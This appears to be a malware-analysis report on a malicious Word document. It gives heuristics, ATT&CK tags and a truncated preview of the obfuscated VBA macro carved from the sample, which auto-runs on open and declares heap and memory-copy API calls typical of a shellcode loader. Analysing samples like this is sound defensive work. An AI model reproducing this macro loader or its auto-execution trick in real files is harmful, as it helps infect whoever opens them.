MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that is set to execute automatically upon opening (AutoOpen). The macro's code is heavily obfuscated and uses Windows API calls, suggesting it is designed to download and execute a secondary payload. The presence of the AutoOpen marker and the VBA macros strongly indicates a macro-based attack, commonly delivered via spearphishing attachments.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78601 bytes |
SHA-256: a067f62fb024d0ae0868b98676f233d90f388d6cb4968a08d4cf12ab234d7eee |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function frQ2nU9d0N Lib "USEr32" Alias "EnumPropsA" (ByVal OK22JHyuwR As LongPtr, ByVal IWcsVDI9Ob As LongPtr) As Long Private Declare PtrSafe Function Dl3ftAeOshvjLj Lib "USEr32" Alias "GetDesktopWindow" () As LongPtr Private Declare PtrSafe Function J5axIxPsYk Lib "USEr32" Alias "SetPropA" (ByVal Mv0v4wc5MZKr As LongPtr, ByVal ip8YLD2iUwT As String, ByVal acIQLvnCK As LongPtr) As Long Private Declare PtrSafe Function E4lxBzceDX8WN8 Lib "KERnel32" Alias "HeapCreate" (ByVal EAo As Long, ByVal OGTR2KL8bN6id As LongPtr, ByVal nOXIjAj As LongPtr) As LongPtr Private Declare PtrSafe Function jXBkDHX9dfN92IgZXc3mAPJUV Lib "KERnel32" Alias "HeapAlloc" (ByVal pLXFyS As LongPtr, ByVal u6st3I As Long, ByVal Sw8HenuXgtx4 As LongPtr) As LongPtr Private Declare PtrSafe Sub VUVPzRdYYpl5kAsPxJ Lib "KERnel32" Alias "RtlMoveMemory" (VmG3 As Any, ByRef xDd6 As Any, ByVal mVivQM As Long) #Else Private Declare Function frQ2nU9d0N Lib "USEr32" Alias "EnumPropsA" (ByVal C47viJXQWDgjQT As Long, ByVal GOsJs As Long) As Long Private Declare Function Dl3ftAeOshvjLj Lib "USEr32" Alias "GetDesktopWindow" () As Long Private Declare Function J5axIxPsYk Lib "USEr32" Alias "SetPropA" (ByVal Q3HV As Long, ByVal pEYwNsw As String, ByVal iNtGfeBY81 As Long) As Long Private Declare Function E4lxBzceDX8WN8 Lib "KERnel32" Alias "HeapCreate" (ByVal jI6OKVAGD As Long, ByVal dSKj As Long, ByVal baP As Long) As Long Private Declare Function jXBkDHX9dfN92IgZXc3mAPJUV Lib "KERnel32" Alias "HeapAlloc" (ByVal lw25uQd9AIB As Long, ByVal SKSmJEy As Long, ByVal taaADLbBx33 As Long) As Long Private Declare Sub VUVPzRdYYpl5kAsPxJ Lib "KERnel32" Alias "RtlMoveMemory" (lLn3zhGoO2 As Any, ByRef otulWFRiMxLXS As Any, ByVal tMJoy3IE As Long) #End If Sub autOOpEN() Call IJK9ljmAnDLdW End Sub Static Function IJK9ljmAnDLdW() As Long Call WQSMwk2TQDmhY6h5qndAY3 End Function Private Function WQSMwk2TQDmhY6h5qndAY3() As String Call HWM3Q0iHgO13PkDD2zZE End Function Public Function HWM3Q0iHgO13PkDD2zZE() As Object Call zQPmsMnYCgubrJiv32eHmK End Function Static Function zQPmsMnYCgubrJiv32eHmK() As Object Call vw6TqwrRUSTP5yzPfDQZ End Function Function vw6TqwrRUSTP5yzPfDQZ() As Double Call Byk5zymrVEO3PyfP3Yf0QFZr End Function Static Function Byk5zymrVEO3PyfP3Yf0QFZr() As Integer Call StzGFiEGf3yMT4vM79iqfCOb End Function Static Function StzGFiEGf3yMT4vM79iqfCOb() As Variant Call WucY5XYoreyFxaKxEmslHzg End Function Static Function WucY5XYoreyFxaKxEmslHzg() As Currency Call GcibIK70E20V End Function Static Function GcibIK70E20V() As Currency Call qPSTmwn3p9PRCOI End Function Private Function qPSTmwn3p9PRCOI() As Boolean Call p4pAIYSJLapmLbOvcRim End Function Sub p4pAIYSJLapmLbOvcRim() Call prWYVwjGRXF9yxAX8a9ll2Y End Sub Function prWYVwjGRXF9yxAX8a9ll2Y() As String Call tMdkgyBpkWr End Function Public Function tMdkgyBpkWr() As Byte Call Is0xiJWBgVLrzSzl End Function Private Function Is0xiJWBgVLrzSzl() As Variant Call umm4vF6EvaI End Function Function umm4vF6EvaI() As Long Call JleKqq5PzJxrepJXzob End Function Static Function JleKqq5PzJxrepJXzob() As Currency Call hGbkPlK0yEcuvr End Function Private Function hGbkPlK0yEcuvr() As Single Call K3Xuy4KdI5 End Function Public Function K3Xuy4KdI5() As String Call HnTxlVIblcV1IeR0zSG4o End Function Function HnTxlVIblcV1IeR0zSG4o() As Object Call KOR3pJDJKQS6C29H End Function Static Function KOR3pJDJKQS6C29H() As Currency Call p4wsp5X8bXY6vv66fRp4MsZ End Function Public Function p4wsp5X8bXY6vv66fRp4MsZ() As Object Call pBZX5dOGNhPqbUk0aDX6 End Function Static Function pBZX5dOGNhPqbUk0aDX6() As Integer Call iL9KZbiElAtoqKhRApbzND End Function Private Function iL9KZbiElAtoqKhRApbzND() As Currency Call Ikd7FxvnkjZQMRu2Rs93Vq9xH End Functio ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.